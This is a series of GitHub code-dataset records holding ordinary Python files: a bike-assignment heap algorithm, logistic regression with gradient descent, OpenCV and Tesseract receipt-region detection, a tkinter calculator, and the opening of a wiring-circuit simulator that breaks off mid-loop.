distances[-1].sort(reverse=True)\n\n \n min_distances = [distances[i].pop() for i in range(W)]\n \n # use heap to assign bikes to the workers\n heapq.heapify(min_distances) # Please don't forget to heapify the list first before operating the heap methods\n assigned_bikes = set()\n ans = [0] * W\n \n while len(assigned_bikes) < W:\n smallest_dis, worker, bike = heapq.heappop(min_distances)\n\n if bike not in assigned_bikes:\n assigned_bikes.add(bike)\n ans[worker] = bike\n else:\n heapq.heappush(min_distances, distances[worker].pop())\n \n return ans\n ","repo_name":"Pennylele/Algorithms-fun-daily","sub_path":"1057.py","file_name":"1057.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"3310748393","text":"# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\n\r\ndef load_data(filepath):\r\n \"\"\"\r\n Load data.\r\n Revised codes and the data are from Machine Learning in Action.\r\n \"\"\"\r\n X = []\r\n Y = []\r\n with open(file=filepath, mode='r') as input:\r\n for line in input.readlines():\r\n x1_x2_y = line.strip().split()\r\n X.append([x1_x2_y[0], x1_x2_y[1]])\r\n Y.append(int(x1_x2_y[2]))\r\n return np.array(X, dtype=np.float32), np.array(Y, dtype=np.float32)\r\n\r\n\r\ndef sigmoid(z):\r\n \"\"\"\r\n sigmoid / logistic function (i.e., activation)\r\n compute the sigmoid of z element-wise\r\n np.exp is preferable to math.exp:\r\n - the parameter z is often a vector or a matrix, and np.exp can compute them element-wise\r\n \"\"\"\r\n return 1.0 / (1.0 + np.exp(-z))\r\n\r\ndef gradient_descent(X, Y, nx, ny, m, num_iterations, alpha):\r\n \"\"\"\r\n Gradient descent to train parameters.\r\n \"\"\"\r\n W = np.zeros(shape=(nx, 1), dtype=np.float32) # weights initialization\r\n b = 0.0 # bias initialization\r\n for i in range(num_iterations):\r\n Z = np.dot(W.T, X) + b # shape: (1, m)\r\n A = sigmoid(Z) # shape: (1, m)\r\n\r\n if i % 1000 == 0:\r\n # two strategies are both ok\r\n cost_1 = -1.0 / m * (np.dot(Y, np.log(A).T) + np.dot((1-Y), np.log(1-A).T))\r\n print('cost_1:{}'.format(np.squeeze(cost_1)))\r\n cost_2 = -1.0 / m * np.sum(np.multiply(Y, np.log(A)) + np.multiply(1-Y, np.log(1-A)))\r\n print('cost_2:{}'.format(cost_2))\r\n\r\n # computation graph\r\n dZ = A - Y # The derivative of cost to A to Z. shape: (1, m)\r\n dW = 1.0 / m * np.dot(X, dZ.T) # The derivative of cost to A to Z to W. shape: (nx, 1)\r\n W -= alpha * dW # update W\r\n db = 1.0 / m * np.sum(dZ) # The derivative of cost to A to Z to b\r\n b -= alpha * db # update b\r\n return W, b\r\n\r\ndef plotBestFit(X, Y, w, b):\r\n \"\"\"\r\n Plot src data and final model.\r\n Revised codes from Machine Learning in Action.\r\n \"\"\"\r\n import matplotlib.pyplot as plt\r\n xcord1 = []\r\n ycord1 = []\r\n xcord2 = []\r\n ycord2 = []\r\n\r\n for i in range(X.shape[1]):\r\n if int(Y[0, i]) == 1:\r\n xcord1.append(X[0, i])\r\n ycord1.append(X[1, i])\r\n else:\r\n xcord2.append(X[0, i])\r\n ycord2.append(X[1, i])\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n ax.scatter(xcord1, ycord1, s=30, c='red', marker='s')\r\n ax.scatter(xcord2, ycord2, s=30, c=\"green\")\r\n x = np.linspace(-3, 3, 100)\r\n y = -(b+w[0][0] * x) / w[1][0]\r\n ax.plot(x, y)\r\n plt.xlabel('x1')\r\n plt.ylabel('x2')\r\n plt.title('Logistic regression')\r\n plt.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n X, Y = load_data('test_data_from_ML_in_action.txt')\r\n print('before X shape:{}, Y shape:{}'.format(X.shape, Y.shape))\r\n X = np.transpose(X)\r\n Y = np.reshape(Y, newshape=(1, Y.shape[0]))\r\n print('after X shape:{}, Y shape:{}'.format(X.shape, Y.shape))\r\n nx = X.shape[0]\r\n ny = Y.shape[0]\r\n m = X.shape[1]\r\n print('nx:%d, ny:%d, m:%d' % (nx, ny, m))\r\n print('first three examples:')\r\n print('x:{}, y:{}'.format(X[:,0:3], Y[:,0:3]))\r\n num_iterations = 10000\r\n alpha = 0.01\r\n\r\n w, b = gradient_descent(X, Y, nx, ny, m, num_iterations, alpha)\r\n print(w)\r\n print(b)\r\n plotBestFit(X, Y, w, b)\r\n","repo_name":"gaoisbest/Machine-Learning-and-Deep-Learning-basic-concepts-and-sample-codes","sub_path":"Logistic regression/Logistic_regression_vectorized.py","file_name":"Logistic_regression_vectorized.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"28325034187","text":"import cv2 as cv\nimport numpy as np\nimport sys\n# from PIL import Image\nfrom enum import Enum\nimport pytesseract\nfrom difflib import SequenceMatcher\nimport imutils\n\nclass locales(Enum):\n TiendaInglesa = 1\n Disco = 2\n Devoto = 3\n Geant = 4\n Kinko = 5\n Frog = 6\n Macro = 7\n Tata = 8\n\n\nclass preprocessing:\n\n img = 0\n thresh = 0\n gray_img = 0\n deskewed = 0\n denoised = 0\n cleaned = 0\n joined = 0\n height = 0\n width = 0\n thresholdingBlockSize = 3009\n thresholdingConstant = 2\n cannyThresh1 = 100\n cannyThresh2 = 200\n edges = 0\n region = 0\n cropped = 0\n ticketWidthmm = 79\n consumoFinalTIBoxWidthmm = 65\n consumoFinalTIBoxHeightmm = 9.5\n consumoFinalVarBoxWidthmm = 70\n consumoFinalVarBoxHeightmm = 12\n consumoFinalDevSBoxWidthmm = 59\n consumoFinalDevSBoxHeightmm = 9.5\n consumoFinalDevLBoxWidthmm = 59\n consumoFinalDevLBoxHeightmm = 15\n local = 0\n consumoFinalBoxWidthPx = 0\n consumoFinalBoxHeightPx = 0\n croppedImgWidthPx = 0\n croppedImgHeightPx = 0\n CFBoxWidthTolerance = 0.20\n CFBoxHeightTolerance = 0.20\n erodeKernelSize = 45\n extentLimit = 0.75\n CFText = \"CONSUMO FINAL\"\n CFBoxFound = False\n productRegion = 0\n priceRegion = 0\n priceAreaDivisionLim = 0.62\n\n\n def __init__(self, imgPath, supermarket):\n self.getImage(imgPath)\n self.local = supermarket\n self.height, self.width = self.img.shape[:2]\n\n def getImage(self, imgPath):\n self.img = cv.imread(imgPath)\n if self.img is None:\n sys.exit(\"Could not open the image\")\n\n def grayscaling(self):\n self.gray_img = cv.cvtColor(self.img, cv.COLOR_BGR2GRAY)\n\n def adaptiveThresholding(self):\n self.grayscaling()\n self.thresh = cv.adaptiveThreshold(self.gray_img, 255, cv.ADAPTIVE_THRESH_GAUSSIAN_C, cv.THRESH_BINARY, self.thresholdingBlockSize, self.thresholdingConstant)\n\n def deskew(self, image):\n coords = np.column_stack(np.where(image > 0))\n angle = cv.minAreaRect(coords)[-1]\n if angle < -45:\n angle = -(90 + angle)\n else:\n angle = -angle\n (h, w) = image.shape[:2]\n center = (w // 2, h // 2)\n M = cv.getRotationMatrix2D(center, angle, 1.0)\n rotated = cv.warpAffine(image, M, (w, h), flags=cv.INTER_CUBIC, borderMode=cv.BORDER_REPLICATE)\n return rotated\n\n def denoise(self):\n self.denoised = cv.fastNlMeansDenoising(self.thresh, None, 100, 21, 49)\n\n def cleanImage(self):\n kernel = np.ones((5,5),np.uint8)\n dilatedImage = cv.dilate(self.thresh, kernel, None, iterations=1)\n self.cleaned = cv.erode(dilatedImage, kernel, None, iterations=1)\n\n def edgeDetection(self):\n self.gray_img = cv.cvtColor(self.img, cv.COLOR_BGR2GRAY)\n thresh = cv.threshold(self.gray_img, 180, 255, cv.THRESH_BINARY)[1]\n self.edges = cv.Canny(thresh, self.cannyThresh1, self.cannyThresh2)\n\n def findPaperEdge(self):\n self.grayscaling()\n self.adaptiveThresholding()\n self.cleanImage()\n self.displayImage(self.cleaned)\n self.joinLetters()\n self.displayImage(self.joined)\n cv.imshow('output', self.img)\n cv.waitKey(0)\n\n kernel = np.ones((self.erodeKernelSize,self.erodeKernelSize),np.uint8)\n eroded = cv.erode(self.thresh, kernel, None, iterations=1)\n cv.imshow('output', eroded)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n\n contours, hierarchy = cv.findContours(eroded, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n im3 = cv.cvtColor(eroded, cv.COLOR_GRAY2BGR)\n\n maxArea = 0\n savedContour = 0\n for i in range(0, len(contours)):\n area = cv.contourArea(contours[i])\n if area > maxArea:\n maxArea = area\n savedContour = i\n cv.drawContours(im3, contours, savedContour, (0,255,0), 8, cv.FILLED)\n cv.imshow('output', im3)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n \"\"\"\n lines = cv.HoughLines(im3,1,np.pi/180,200)\n for line in lines:\n rho,theta = line[0]\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a*rho\n y0 = b*rho\n x1 = int(x0 + 1000*(-b))\n y1 = int(y0 + 1000*(a))\n x2 = int(x0 - 1000*(-b))\n y2 = int(y0 - 1000*(a))\n cv.line(im3,(x1,y1),(x2,y2),(0,0,255),2)\n cv.imshow('output', im3)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n \"\"\"\n contours_poly = cv.approxPolyDP(contours[savedContour], 150, True)\n cv.drawContours(im3, contours_poly, -1, (0,0,255), 18, cv.FILLED)\n cv.imshow('output', im3)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n\n rect = cv.minAreaRect(contours_poly)\n if rect[1][0] < rect[1][1]:\n self.croppedImgWidthPx = rect[1][0]\n self.croppedImgHeightPx = rect[1][1]\n else:\n self.croppedImgWidthPx = rect[1][1]\n self.croppedImgHeightPx = rect[1][0]\n\n area = cv.contourArea(contours[savedContour])\n extent = float(area)/(self.croppedImgHeightPx*self.croppedImgWidthPx)\n print(extent)\n\n if extent < self.extentLimit:\n #find straight lines\n print(\"Mal detectado\")\n\n box = cv.boxPoints(rect)\n box = np.int0(box)\n\n cv.drawContours(im3, [box], 0, (0,0,255), 8)\n cv.imshow('output', im3)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n\n return box\n\n def calculateCFBoxDims(self):\n anchoBoxmm = 0\n altoBoxmm = 0\n if self.local == locales.TiendaInglesa:\n anchoBoxmm = self.consumoFinalTIBoxWidthmm\n altoBoxmm = self.consumoFinalTIBoxHeightmm\n elif self.local == locales.Geant:\n anchoBoxmm = self.consumoFinalVarBoxWidthmm\n altoBoxmm = self.consumoFinalVarBoxHeightmm\n elif self.local == locales.Disco:\n anchoBoxmm = self.consumoFinalVarBoxWidthmm\n altoBoxmm = self.consumoFinalVarBoxHeightmm\n elif self.local == locales.Devoto:\n anchoBoxmm = self.consumoFinalDevSBoxWidthmm\n altoBoxmm = (self.consumoFinalDevSBoxHeightmm + self.consumoFinalDevLBoxHeightmm)/2\n self.CFBoxHeightTolerance = 0.35\n elif self.local == locales.Frog:\n anchoBoxmm = self.consumoFinalVarBoxWidthmm\n altoBoxmm = self.consumoFinalTIBoxHeightmm\n elif self.local == locales.Kinko:\n anchoBoxmm = self.consumoFinalVarBoxWidthmm\n altoBoxmm = self.consumoFinalTIBoxHeightmm\n elif self.local == locales.Tata:\n anchoBoxmm = self.consumoFinalVarBoxWidthmm\n altoBoxmm = self.consumoFinalTIBoxHeightmm\n elif self.local == locales.Macro:\n sys.exit()\n\n self.consumoFinalBoxWidthPx = self.croppedImgWidthPx*anchoBoxmm/self.ticketWidthmm\n self.consumoFinalBoxHeightPx = altoBoxmm*self.consumoFinalBoxWidthPx/anchoBoxmm \n\n def detectCFBox(self):\n boxFound = False\n kernel = np.ones((7,7),np.uint8)\n contourImg = cv.erode(self.cropped, kernel, None, iterations=1)\n contours, hierarchy = cv.findContours(contourImg, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n recCenter = 0\n recWidth = 0\n recHeight = 0\n CFBox = 0\n widthHighLimit = self.consumoFinalBoxWidthPx*(1+self.CFBoxWidthTolerance)\n widthLowLimit = self.consumoFinalBoxWidthPx*(1-self.CFBoxWidthTolerance)\n heightHighLimit = self.consumoFinalBoxHeightPx*(1+self.CFBoxHeightTolerance)\n heightLowLimit = self.consumoFinalBoxHeightPx*(1-self.CFBoxHeightTolerance)\n print(\"Limits W=(\"+str(widthLowLimit)+\", \"+str(widthHighLimit)+\") H=(\"+str(heightLowLimit)+\", \"+str(heightHighLimit)+\")\")\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n\n #self.displayImageContours(contourImg, contours, -1)\n i = 0\n\n for c in contours:\n simplifiedContour = cv.approxPolyDP(c, 3, True)\n boundingRect = cv.minAreaRect(simplifiedContour)\n CFBox = boundingRect\n recCenter = boundingRect[0]\n recWidth = boundingRect[1][0]\n recHeight = boundingRect[1][1]\n widthOK1 = (recWidth < widthHighLimit) and (recWidth > widthLowLimit)\n heightOK1 = (recHeight < heightHighLimit) and (recHeight > heightLowLimit)\n widthOK2 = (recWidth < heightHighLimit) and (recWidth > heightLowLimit)\n heightOK2 = (recHeight < widthHighLimit) and (recHeight > widthLowLimit)\n\n #print(\"W=\"+str(recWidth)+\" H=\"+str(recHeight))\n #self.displayImageContours(contourImg, contours, i)\n\n if ((heightOK1 and widthOK1) or (heightOK2 and widthOK2)) and (recCenter[1] < self.croppedImgHeightPx/2):\n text = self.readRegionText(np.int0(cv.boxPoints(CFBox)), self.cropped)\n print(text)\n similarity = SequenceMatcher(None, text, self.CFText).ratio()\n print(similarity)\n cv.waitKey(0)\n if similarity >= 0.7:\n print(\"Box found!\")\n boxFound = True\n break\n \n i = i + 1\n\n box = np.int0(cv.boxPoints(CFBox))\n\n return box, boxFound\n\n def readRegionText(self, region, image):\n blank = np.zeros_like(image)\n boxRegion = cv.fillConvexPoly(blank, region, 255)\n boxRegionImage = cv.bitwise_and(image, boxRegion)\n kernel = np.ones((3,3),np.uint8)\n boxRegionImage = cv.dilate(boxRegionImage, kernel, None, iterations=1)\n cv.imwrite('textRegion.jpg', boxRegionImage)\n text = pytesseract.image_to_string(boxRegionImage, lang=\"spa\", config='-psm 6 -c tessedit_char_whitelist=12345678ABCDEFGHIJKLMNOPQRSTUVWXYZ., load_system_dawg=false load_freq_dawg=false')\n return text\n\n def joinLetters(self):\n kernel = np.ones((5,5),np.uint8)\n erodedImage = cv.erode(self.cleaned, kernel, None, iterations=1)\n self.joined = cv.dilate(erodedImage, kernel, None, iterations=1)\n\n def ROI(self, box):\n #ROI= np.array([[(120,self.height),(120,220),(750,220),(750,self.height)]], dtype= np.int32)\n blank= np.zeros_like(self.gray_img)\n region_of_interest= cv.fillConvexPoly(blank, box,255)\n region_of_interest_image= cv.bitwise_and(self.thresh, region_of_interest)\n return region_of_interest_image\n\n def extractReadingAreas(self, image, boxFactura, boxCF):\n _, prodAreaLowerLim, prodAreaLeftLim, priceAreaRightLim = self.boxLimits(boxFactura)\n _, prodAreaUpperLim, cfBoxLeft, _ = self.boxLimits(boxCF)\n prodAreaRightLim = round(self.croppedImgWidthPx*self.priceAreaDivisionLim) + prodAreaLeftLim\n priceAreaLeftLim = prodAreaRightLim\n priceAreaUpperLim = prodAreaUpperLim\n priceAreaLowerLim = prodAreaLowerLim\n productsBox = np.array([[prodAreaLeftLim, prodAreaLowerLim], [prodAreaLeftLim, prodAreaUpperLim], [prodAreaRightLim, prodAreaUpperLim], [prodAreaRightLim, prodAreaLowerLim]])\n pricesBox = np.array([[priceAreaLeftLim, priceAreaLowerLim], [priceAreaLeftLim, priceAreaUpperLim], [priceAreaRightLim, priceAreaUpperLim], [priceAreaRightLim, priceAreaLowerLim]])\n \n return productsBox, pricesBox\n\n def boxLimits(self, boxPoints):\n lower = max(boxPoints[:,1])\n upper = min(boxPoints[:,1])\n left = min(boxPoints[:,0])\n right = max(boxPoints[:,0])\n return upper, lower, left, right\n \n def displayImage(self, img):\n cv.imshow('output', img)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n\n def displayImageBox(self, img, boxPoints):\n im3 = cv.cvtColor(img, cv.COLOR_GRAY2BGR)\n cv.drawContours(im3, [boxPoints], 0, (0,0,255), 8)\n cv.imshow('output', im3)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n\n def displayImageContours(self, img, contour, idx):\n im3 = cv.cvtColor(img, cv.COLOR_GRAY2BGR)\n cv.drawContours(im3, contour, idx, (0,0,255), 8)\n cv.imshow('output', im3)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n\n def matchTemplate(self, temp, img):\n template = cv.imread(temp)\n template = cv.cvtColor(template, cv.COLOR_BGR2GRAY)\n template = cv.Canny(template, 50, 200)\n (tH, tW) = template.shape[:2]\n cv.imshow(\"Template\", template)\n found = None\n\n for scale in np.linspace(0.2, 2.0, 40)[::-1]:\n resized = imutils.resize(img, width=int(img.shape[1]*scale))\n r = img.shape[1]/float(resized.shape[1])\n if resized.shape[0] < tH or resized.shape[1] < tW:\n break\n edged = cv.Canny(resized, 50, 200)\n result = cv.matchTemplate(edged, template, cv.TM_CCOEFF)\n (_, maxVal, _, maxLoc) = cv.minMaxLoc(result)\n np.dstack([edged, edged, edged])\n # clone = np.dstack([edged, edged, edged])\n #cv.rectangle(clone, (maxLoc[0], maxLoc[1]),(maxLoc[0] + tW, maxLoc[1] + tH), (0, 0, 255), 2)\n #cv.namedWindow(\"Visualize\", cv.WINDOW_NORMAL)\n #cv.imshow(\"Visualize\", clone)\n #cv.waitKey(0)\n\n if found is None or maxVal > found[0]:\n found = (maxVal, maxLoc, r)\n\n (_, maxLoc, r) = found\n (startX, startY) = (int(maxLoc[0] * r), int(maxLoc[1] * r))\n (endX, endY) = (int((maxLoc[0] + tW) * r), int((maxLoc[1] + tH) * r))\n\n img_color = cv.cvtColor(img, cv.COLOR_GRAY2BGR)\n cv.rectangle(img_color, (startX, startY), (endX, endY), (0, 0, 255), 2)\n cv.imshow(\"Image\", img_color)\n cv.waitKey(0)\n cv.imwrite('logo_found.jpg', img_color)\n\nif __name__ == \"__main__\":\n\n cv.namedWindow(\"output\", cv.WINDOW_NORMAL)\n\n functions = preprocessing(\"ti_imposible.jpg\", locales.TiendaInglesa)\n \"\"\"\n #functions.getImage()\n #print(functions.gray_img.type())\n functions.thresh = functions.adaptiveThresholding()\n functions.deskewed = functions.deskew(functions.thresh)\n functions.denoise()\n functions.cleanImage()\n functions.joinLetters()\n cv.imshow('output', functions.thresh)\n cv.waitKey(0)\n cv.imwrite('thresholding.jpg', functions.thresh)\n im2 = functions.thresh\n \"\"\"\n functions.region = functions.findPaperEdge()\n functions.cropped = functions.ROI(functions.region)\n cv.imshow('output', functions.cropped)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n cv.imwrite('cropped.jpg', functions.cropped)\n\n functions.matchTemplate(\"tiendainglesa_template.jpg\", functions.cropped)\n\n functions.calculateCFBoxDims()\n CF, functions.CFBoxFound = functions.detectCFBox()\n \n if not functions.CFBoxFound:\n print(\"-------------NO ENCONTRADO-------------\")\n sys.exit()\n\n im3 = cv.cvtColor(functions.cropped, cv.COLOR_GRAY2BGR)\n cv.drawContours(im3, [CF], 0, (0,0,255), 8)\n cv.imshow('output', im3)\n key = cv.waitKey(0)\n if key == ord('q'):\n sys.exit()\n\n functions.productRegion, functions.priceRegion = functions.extractReadingAreas(functions.cropped, functions.region, CF)\n cv.drawContours(im3, [functions.productRegion], 0, (0,0,255), 8)\n cv.imshow('output', im3)\n key = cv.waitKey(0)\n cv.drawContours(im3, [functions.priceRegion], 0, (255,0,0), 8)\n cv.imshow('output', im3)\n key = cv.waitKey(0)\n productsText = functions.readRegionText(functions.productRegion, functions.cropped)\n priceText = functions.readRegionText(functions.priceRegion, functions.cropped)\n\n with open('productsText.txt', 'w') as prodTxtFile:\n prodTxtFile.write(productsText)\n prodTxtFile.close()\n\n with open('priceText.txt', 'w') as priceTxtFile:\n priceTxtFile.write(priceText)\n priceTxtFile.close()\n\n \"\"\"\n functions.edgeDetection()\n cv.imshow('output', functions.edges)\n cv.waitKey(0)\n cv.imwrite('canny.jpg', functions.edges)\n\n \n cv.imshow('output', functions.cleaned)\n cv.waitKey(0)\n # ROI= np.array([[(120,functions.height),(120,220),(750,220),(750,functions.height)]], dtype= np.int32)\n # draw = cv.polylines(functions.cleaned, ROI, True, (0,255,0), thickness=3)\n # cv.imshow('output', draw)\n # cv.waitKey(0)\n cv.imwrite('cleaned.jpg', functions.cleaned)\n cv.imshow('output', functions.joined)\n cv.waitKey(0)\n cv.imwrite('joined.jpg', functions.joined)\n \"\"\"","repo_name":"agustincosta/thecampeonato","sub_path":"tutorial/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":16778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35806967720","text":"from tkinter import *\nwin=Tk()\nwin.title(\"Calculator\")\nwin.configure(bg=\"black\")\nwin.geometry(\"350x520\")\nwin.resizable(0,0)\n\nglobal expression\nexpression=0\n#define entry field\n\ne1=Entry(win,width=15,font=\"Ariel 28 bold\",borderwidth=5,bg=\"grey\",takefocus=True)\ne1.place(x=10,y=20)\n\n# define button_click function\n\ndef number_click(number):\n global expression\n expression=e1.get()\n expression=expression+str(number)\n e1.delete(0,END)\n e1.insert(END,expression)\n\ndef clear():\n global expression\n expression=\"\"\n e1.delete(0,END)\n\ndef equal():\n try:\n global expression\n expression=e1.get()\n e1.delete(0,END)\n result=str(eval(expression))\n e1.insert(END,result)\n expression=\"\"\n except:\n pass\n\ndef display_result(e):\n try:\n expression= e1.get()\n e1.delete(0,END)\n result=str(eval(expression))\n e1.insert(END,result)\n except:\n pass\n\ne1.bind('',display_result)\n\n# defining buttons\n\nbtn1=Button(win,text=\"1\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('1'))\nbtn2=Button(win,text=\"2\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('2'))\nbtn3=Button(win,text=\"3\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('3'))\nbtn4=Button(win,text=\"4\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('4'))\nbtn5=Button(win,text=\"5\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('5'))\nbtn6=Button(win,text=\"6\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('6'))\nbtn7=Button(win,text=\"7\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('7'))\nbtn8=Button(win,text=\"8\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('8'))\nbtn9=Button(win,text=\"9\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('9'))\nbtn0=Button(win,text=\"0\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('0'))\nbtn_dot=Button(win,text=\".\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('.'))\n\nbtn_add=Button(win,text=\"+\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('+'))\nbtn_sub=Button(win,text=\"-\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('-'))\nbtn_mul=Button(win,text=\"x\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('*'))\nbtn_div=Button(win,text=\"/\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=lambda:number_click('/'))\n\nbtn_equals=Button(win,text=\"=\",width=11,font=\"Ariel 22 bold\",bg=\"gray\",command=equal)\nbtn_clear=Button(win,text=\"Clear\",width=5,font=\"Ariel 22 bold\",bg=\"gray\",command=clear)\n\n# putting buttons on the screen\n\nbtn7.place(x=10,y=100)\nbtn8.place(x=122,y=100)\nbtn9.place(x=234,y=100)\n\nbtn4.place(x=10,y=170)\nbtn5.place(x=122,y=170)\nbtn6.place(x=234,y=170)\n\nbtn1.place(x=10,y=240)\nbtn2.place(x=122,y=240)\nbtn3.place(x=234,y=240)\n\nbtn0.place(x=10,y=310)\nbtn_sub.place(x=122,y=310)\nbtn_div.place(x=234,y=310)\n\nbtn_add.place(x=10,y=380)\nbtn_dot.place(x=122, y=380)\nbtn_clear.place(x=234,y=380)\n\nbtn_mul.place(x=10,y=450)\nbtn_equals.place(x=122,y=450)\n\n\nwin.mainloop()\n","repo_name":"AmanPatel18/Calculator-Python-Tkinter-","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"43914668067","text":"import sys\r\n\r\nfrom wiring.bit_dictionary import Bit_Dictionary\r\n\r\nfrom wiring.connection import Connection\r\nfrom wiring.hwcassert import HWCAssert\r\nfrom wiring.memory import Memory\r\nfrom wiring.logic import Logic\r\nfrom wiring.io import Input\r\nfrom wiring.io import Output\r\n\r\nfrom wiring.logic_ops import *\r\n\r\n# Fields to store the values of the optional arguments\r\nreset = False\r\ngenTemplate = False\r\ntick_count = 0\r\nwire_filename = None\r\ninput_filename = None\r\ndebug = 0\r\nauto = False\r\n\r\n# Internal bit_dictionary that stores all the bit information\r\nglobal bit_dictionary \r\nbit_dictionary = Bit_Dictionary()\r\n\r\n# Data structures to store the components used \r\noutputs = []\r\ninputs = []\r\n\r\nlogic_ops = {}\r\nconstants = {}\r\nmemory = {}\r\n\r\ndef main():\r\n\r\n '''\r\n Arguments we will support currently:\r\n Usage: python sim_main.py (--reset) (--genTemplate) (--run ) (--input )\r\n\r\n --run : Sets the simulator to run for of ticks\r\n\r\n --input : Sets the input file for the simulator, file_name supports csv structure\r\n\r\n --reset: Resets the memory and internal bit array\r\n\r\n --genTemplate: generates the input template\r\n\r\n --debug : Stops program after certain debug step and returns the output\r\n '''\r\n \r\n # If the only argument is the sim_main.py, then return error message\r\n if (len(sys.argv) < 2):\r\n print(\"Correct Usage: python sim_main.py (--reset) (--genTemplate) (--run ) (--input )\")\r\n exit(1)\r\n\r\n # Parses the runtime arguments and sets their respective global flags\r\n parse_args()\r\n\r\n # TODO: read in input files\r\n # TODO: build the object graph\r\n\r\n '''\r\n Dictionary Structure\r\n\r\n The bit dictionary holds all internal bits and what their connections are. This is used to\r\n ultimately build the graph data structure that will be used to model the circuitry. The format\r\n of the dictionary maps bit ranges to read and write values.\r\n\r\n Bit Dictionary Representation:\r\n +---------------------------------------+\r\n | Bit | Read | Write |\r\n | --------|-----------|----------- | \r\n | [0,1] | [a] | c |\r\n | [1,2] | [a,b] | |\r\n | [2,5] | [NOT] | |\r\n | [6,7] | [] | |\r\n +---------------------------------------+\r\n\r\n INVARIANT: If there is no write, then output\r\n\r\n '''\r\n\r\n # Steps\r\n # 1. Find the bit ranges\r\n # 2. Add read and write values depending on line\r\n # 3. Collapse fan out and fan in connections\r\n\r\n\r\n # TODO: CHANGES\r\n # TODO: Create objects for LogicOps (NOT, AND, etc)\r\n # TODO: Change order of parsing to, output side first\r\n # TODO: Lambdas for the connections\r\n\r\n parse_wire_file()\r\n\r\n # Parse and drive input from input file if specified in the command line\r\n if (input_filename != None):\r\n\r\n try:\r\n # TODO: Create input file formats\r\n\r\n # TODO: Parse input file formats\r\n file = open(input_filename, \"r\")\r\n\r\n line = \" \"\r\n user_inputs = {}\r\n\r\n while line:\r\n line = file.readline()\r\n\r\n # Breaks on empty last line\r\n if line == \"\":\r\n break\r\n\r\n csv_inputs = line.strip().split(\",\")\r\n\r\n if len(csv_inputs) != len(inputs):\r\n print(\"Input file does not have the correct number of inputs\")\r\n exit(1)\r\n\r\n for i in range(len(csv_inputs)):\r\n csv_input = int(csv_inputs[i].strip())\r\n usr_input = inputs[i]\r\n\r\n # START THE SIMULATION WITH THIS THIS INPUTS\r\n assert csv_input >= 0\r\n assert csv_input < 2**(csv_input) # TODO: report an error to the user, not assert!\r\n\r\n user_inputs[usr_input] = csv_input\r\n\r\n # TODO: Drive rest of bits off input\r\n # Follow until an output is reached\r\n for constant in constants:\r\n readers = bit_dictionary.get(constant).get_readers()\r\n\r\n for reader in readers:\r\n reader(constants[constant])\r\n\r\n for mem in memory:\r\n readers = bit_dictionary.get(mem[0]).get_readers()\r\n\r\n for reader in readers:\r\n reader(memory.get(mem).get_value())\r\n\r\n for usr_input in user_inputs:\r\n readers = bit_dictionary.get(usr_input).get_readers()\r\n\r\n for reader in readers:\r\n reader(user_inputs.get(usr_input))\r\n\r\n except IOError:\r\n print(\"ERROR: Unable to find or open \" + input_filename + \" or \" + wire_filename)\r\n exit(1)\r\n \r\n else:\r\n\r\n # TODO: write the simiulation algorithm of propegating bits\r\n # Run the simulation\r\n\r\n user_inputs = {}\r\n\r\n # AUTO FLAG: used for testing through test script \r\n\r\n # Relistically we should test all possible single bit inputs to determine if the program actually works\r\n # BUT: for now I'm going to only test single bits -> 1\r\n\r\n #TODO: reset code so we can test all bits\r\n\r\n if (auto):\r\n for hwc_input in inputs:\r\n \r\n user_inputs[hwc_input] = 1\r\n\r\n assert user_inputs[hwc_input] >= 0\r\n assert user_inputs[hwc_input] < 2**(hwc_input[1]) # TODO: report an error to the user, not assert!\r\n\r\n # TODO: Drive rest of bits off input\r\n # Follow until an output is reached\r\n for constant in constants:\r\n readers = bit_dictionary.get(constant).get_readers()\r\n\r\n for reader in readers:\r\n reader(constants[constant])\r\n\r\n for mem in memory:\r\n readers = bit_dictionary.get(mem[0]).get_readers()\r\n\r\n for reader in readers:\r\n reader(memory.get(mem).get_value())\r\n\r\n for user_in in user_inputs:\r\n 